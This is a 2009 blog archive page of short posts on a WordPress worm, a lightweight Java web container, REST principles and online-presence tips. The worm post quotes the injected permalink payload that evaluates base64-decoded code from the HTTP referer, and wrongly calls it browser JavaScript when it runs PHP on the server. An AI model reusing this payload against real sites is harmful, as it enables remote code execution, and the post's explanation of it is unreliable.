Updates from September, 2009 Toggle Comment Threads | Keyboard Shortcuts

  • Nuno Morgadinho 7:25 am on September 7, 2009 Permalink  

    JavaScript eval() is EVIL 

    The blogosphere is full of mentions to the worm that is attacking old versions of the Wordpress blog platform and the attack on the popular Scobleizer blog. I was reading about it in the weekend, particularly how the worm works, what it does, how to prevent it and how to recover from it. As Matt Mullenweg, creator of Wordpress, puts it: "This particular worm, like many before it, is clever". One of the things it does is changing the links of the blog to something like this: 
    /post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
    and this in turn allows evaluated code to be executed. “eval” is evil hum? Although its not something new, still quite cunning. The eval() function evaluates a string and executes it as if it was script code. This means when a user clicks the link on the affected blog, the Javascript arbitrary code will run on the user's browser. Not good. http://wordpress.org/development/2009/09/keep-wordpress-secure/
    http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
     

  • Nuno Morgadinho 5:24 pm on July 14, 2009 Permalink  

    The Gizmo: small and lightweight Java container for web apps 

    You know what they say, “less is more”, right? If you ever looked at Java tools to build web applications you’ve probably stumbled upon dozens of options. So did I, but because @herrb had mentioned at lunch a web thingy he was developing for himself to play about, I asked him for advice on what Java tools I could use and this ended with an invite to look at what he had done.

    His starting point was: how hard would it be to use Eclipse+Eclipse plugins to develop web apps?

    So he started developing the thing and now it’s using:

    • A custom http server based on Apache’s httpcomponents lib
    • The Dojo Toolkit as a Javascript library
    • Freemarker as a Template Engine
    • Eclipse EMF to describe the data schemas
    • Apache log4j as a logger

    Also we talked about working on it together so we ended up publishing it on sourceforge for now. We called it “the Gizmo”. It’s not big and powerful like Apache’s Tomcat but can be useful for someone looking into using a small and lightweight Java container for web apps.

    Also it is important to understand that the initial goal was more to understand how things work and how he could play with these things, plugging them together, etc., rather than working on a full-blown framework. I’ve been using it myself for a small web app me and @aaires are doing in our free time and so far we’ve been happy with it. I wouldn’t say it is ready for production but it is something I would like to contribute in developing further. Especially because there are so many interesting Java libraries out there that we could use in conjunction with the Gizmo and also because using Eclipse for development is just plain fun.

    You can take a look at:

    http://lipog.sf.net

     

    • Joerg 7:02 am on July 27, 2009 Permalink

      Shameless little plug: as of this last weekend the Gizmo also allows for splendid automatic testing of your web apps based on HtmlUnit! It all comes with a tutorial and a little example too. ;-)

      Cheers,
      J.

  • Nuno Morgadinho 7:13 am on June 5, 2009 Permalink  

    Bullet Points about REST 

    REST stands for Representational State Transfer.

    What is the problem?

    • Software architecture research investigates methods for determining how best to partition a system, how components identify and communicate with each other, how they evolve, etc.
    • Do we know any large software architecture that has scaled immensely? Can we learn/take something from it? Yes, the Web and the Internet in general.

    What can we learn from it?

    • Client-server (separation of concerns)
    • Stateless (requests can be processed by different servers for scalability)
    • Caching (performance and fault tolerance)
    • Uniform interface (URI represents object and state)
    • Layered System (components build on top of other components)

    Example

    • Client-server => browser-httpd
    • Stateless, Uniform interface => /car/parts/12337 => URI represents the object and asks for a specific resource.
    • Can be processed by any server because there is no context
    • Output in html, XML or JSON

    Example 2

    • Imagine you could just re-use the component by redirecting requests to it
    • Example: user auth
    • Instead of having the user auth encapsulated in the application we can have the userauth to be a webservice that can be re-used by any application – this is RESTful
     

  • Nuno Morgadinho 5:19 am on May 31, 2009 Permalink  

    Seesmic: Why I don't use it.. 

    One of the reasons I don’t use seesmic is because there is no interesting people there. Can you prove me wrong?

    How about starting a site where invited entrepreneurs hang out and post video content?

    Probably a dumb idea..

     

  • Nuno Morgadinho 4:51 am on May 23, 2009 Permalink  

    12 Steps to Reinforce Your On-Line Presence 

    Need to re-force your presence on-line?

    • Have a central location and link from as many sites as you can to yours.
    • Have a nice central location.
    • Work on cool projects.
    • Share with your viewers interesting content that they cannot get elsewhere.
    • Build your central location in a way that people can interact.
    • Use SEO; Use consulting

    Twelve steps:

    • Provide good content should always be the key. Like gskinner and dougmccane you need a language/technology and you need to focus on that. Sorry but you can’t really be good on something if you’re always trying out different things.
    • Work on cool projects that you love. With people you love. Make things people want.
    • Start by solving your own problems.
    • Port your blog to a nice blogging engine and make it look nice.
    • Talk with a consultant to get your SEO skills up to date.
    • Have a “badge” for people to put on their sites and link to mine. This might be complicated, what would your badge be and why would be people link to you? Well people will link to you if you provide good and fresh content, that’s for sure, you probably don’t need the badge.
    • Make things that bring your local community together for a greater cause.
    • Talk with interesting people about interesting stuff and publish your conclusions.
    • Now is the time to bring out all your energy, all your passions, the best you want to do with the world. The time is now.
    • Test and benchmark cool and interesting stuff.
    • Document: Sounds boring ? Maybe, but you’ll be doing everybody a favour, not least yourself. Forcing yourself to explain things crystalises your own understanding.
    • There is an enormous need for testing guys. Help open-source projects by testing their code. Publish the results.
    • How can people interact with you? Twitter, comments on my blog. What other ways are out there? Friendfeed, Facebook, etc. explore those new mechanisms but in the end don’t forget about the basics. Maybe a mailing list or a google group works.
    • People like exclusive content: Organize something
    • Comment on other people’s blog. Please normally follow the links.

    And you’re right, that was more than 12 steps :-)

     
    • Pages: Prev 1 2 3 4 5 6 7 8 9 10 Next

← Older posts

Newer posts →

c
compose new post
j
next post/next comment
k
previous post/previous comment
r
reply
e
edit
o
show/hide comments
t
go to top
l
go to login
h
show/hide help
esc
cancel